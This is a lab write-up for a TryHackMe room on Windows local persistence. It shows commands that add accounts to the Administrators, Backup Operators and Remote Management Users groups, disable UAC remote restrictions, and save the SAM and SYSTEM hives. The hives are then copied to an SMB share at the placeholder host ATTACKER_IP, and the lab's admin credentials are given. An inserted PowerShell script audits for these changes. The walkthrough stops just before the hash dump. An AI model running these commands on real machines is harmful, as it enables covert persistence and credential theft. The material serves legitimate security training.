https://tryhackme.com/room/windowslocalpersistence

Task 1 - Introduction

Username :	Administrator
Password :	Password321

Task 2 - Tampering With Unprivileged Accounts

Assign Group Memberships

Assuming we already have the password for an unprivileged account, the simplest option is to add it straight to the local administrators group:

C:\> net localgroup administrators thmuser0 /add

To look less suspicious, add the account to the Backup Operators group instead (its members can read any file regardless of ACLs, which is enough to copy the SAM and SYSTEM hives):

C:\> net localgroup "Backup Operators" thmuser1 /add

Since an unprivileged account cannot log in over RDP or WinRM by default, we also need to add it to the Remote Desktop Users group (for RDP) or the Remote Management Users group (for WinRM). Here we will use WinRM as the example:

C:\> net localgroup "Remote Management Users" thmuser1 /add

Even as a member of the Backup Operators group, you will not be able to access all files as expected when logged in via evil-winrm, because UAC's remote restrictions give local accounts a filtered token over network logons. To regain the full privileges, set the LocalAccountTokenFilterPolicy registry value to 1:

C:\> reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
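The changes above (new members in privileged or remote-access groups, and the LocalAccountTokenFilterPolicy override) are all visible from the host. The following PowerShell audit is an added defender-side check, not part of the room or this write-up: run in an elevated session, it compares the members of the abused groups against an assumed per-host baseline, flags the registry override, and lists recent 4732 (member added to a local group) Security events. The `$baseline` table is an assumption to be adapted to each host.

```powershell
# Added audit script for the persistence techniques described above.
# Run in an elevated PowerShell session on the Windows host being checked.

# Groups that grant admin-equivalent or remote-access rights when abused.
$sensitiveGroups = 'Administrators', 'Backup Operators',
                   'Remote Management Users', 'Remote Desktop Users'

# Assumed per-host baseline of expected members (adapt to your environment).
$baseline = @{
    'Administrators'          = @('Administrator')
    'Backup Operators'        = @()
    'Remote Management Users' = @()
    'Remote Desktop Users'    = @()
}

foreach ($group in $sensitiveGroups) {
    $members = Get-LocalGroupMember -Group $group -ErrorAction SilentlyContinue
    foreach ($m in $members) {
        # $m.Name is "COMPUTER\user"; compare on the account part only.
        $account = $m.Name.Split('\')[-1]
        if ($baseline[$group] -notcontains $account) {
            Write-Warning "Unexpected member of '$group': $($m.Name) ($($m.ObjectClass))"
        }
    }
}

# LocalAccountTokenFilterPolicy = 1 disables UAC remote restrictions, so local
# admins get a full (unfiltered) token over WinRM/SMB instead of a filtered one.
$policyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$policy = Get-ItemProperty -Path $policyKey -Name LocalAccountTokenFilterPolicy -ErrorAction SilentlyContinue
if ($policy -and $policy.LocalAccountTokenFilterPolicy -eq 1) {
    Write-Warning "LocalAccountTokenFilterPolicy is 1: UAC remote restrictions are disabled"
}

# Event ID 4732 = a member was added to a security-enabled local group.
# Requires the 'Audit Security Group Management' subcategory to be enabled.
$since  = (Get-Date).AddDays(-7)
$events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4732; StartTime = $since } -ErrorAction SilentlyContinue
foreach ($e in $events) {
    $xml  = [xml]$e.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    # The member is logged as a SID; resolve it to an account name where possible.
    $sid = New-Object System.Security.Principal.SecurityIdentifier($data['MemberSid'])
    try { $who = $sid.Translate([System.Security.Principal.NTAccount]).Value } catch { $who = $data['MemberSid'] }
    Write-Output ("{0}  {1} added to {2} by {3}" -f $e.TimeCreated, $who, $data['TargetUserName'], $data['SubjectUserName'])
}
```

In 4732 events TargetUserName is the group that was modified and SubjectUserName is the account that made the change; if group-management auditing is off, the event loop simply prints nothing.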

Next we make a backup of the SAM and SYSTEM hives and download them to our attacker machine:

C:\> reg save hklm\system system.bak
C:\> reg save hklm\sam sam.bak

Since the PowerShell download does not work so well, we will use impacket-smbserver here to pull the files over SMB:

┌──(kali㉿VirtualBox)-[~]
└─$ mkdir share

┌──(kali㉿VirtualBox)-[~]
└─$ impacket-smbserver -smb2support -username Administrator -password Password321 public share
C:\> copy filename \\ATTACKER_IP\public\

Then we dump the password hash using impacket-secretsdump